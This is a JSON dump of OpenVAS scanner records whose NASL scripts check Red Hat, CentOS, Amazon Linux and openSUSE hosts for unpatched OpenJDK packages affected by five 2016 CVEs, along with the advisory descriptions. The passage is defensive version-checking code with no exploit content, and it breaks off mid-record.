["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2016:0676-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871601\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-22 05:16:42 +0200 (Fri, 22 Apr 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2016:0676-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.7.0-openjdk packages provide\nthe OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development\nKit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0676-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-April/msg00032.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.101~2.6.6.1.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-headless\", rpm:\"java-1.7.0-openjdk-headless~1.7.0.101~2.6.6.1.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2016:0723-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871608", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2016:0723-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871608\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:18:57 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2016:0723-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.6.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide\nthe OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software\nDevelopment Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0723-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-May/msg00009.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.39~1.13.11.0.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.39~1.13.11.0.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.0.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.39~1.13.11.0.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:56:11", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-700)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120689", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120689\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:08 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-700)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in OpenJDK. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.6.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-700.html\");\n script_cve_id(\"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-0686\", \"CVE-2016-3427\", \"CVE-2016-0687\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.1.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:57:34", "description": "Check the version of java", "cvss3": {}, "published": "2016-04-22T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0675 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310882468", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882468", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882468\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-22 05:17:09 +0200 (Fri, 22 Apr 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0675 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.7.0-openjdk packages provide\nthe OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0675\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-April/021837.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1230-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851292", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851292", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851292\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-06 15:29:03 +0530 (Fri, 06 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1230-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for java-1_7_0-openjdk to version 2.6.6 fixes five security\n issues.\n\n These security issues were fixed:\n\n - CVE-2016-0686: Ensure thread consistency (bsc#976340).\n\n - CVE-2016-0687: Better byte behavior (bsc#976340).\n\n - CVE-2016-0695: Make DSA more fair (bsc#976340).\n\n - CVE-2016-3425: Better buffering of XML strings (bsc#976340).\n\n - CVE-2016-3427: Improve JMX connections (bsc#976340).\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1230-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-accessibility\", rpm:\"java-1_7_0-openjdk-accessibility~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap\", rpm:\"java-1_7_0-openjdk-bootstrap~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-debugsource\", 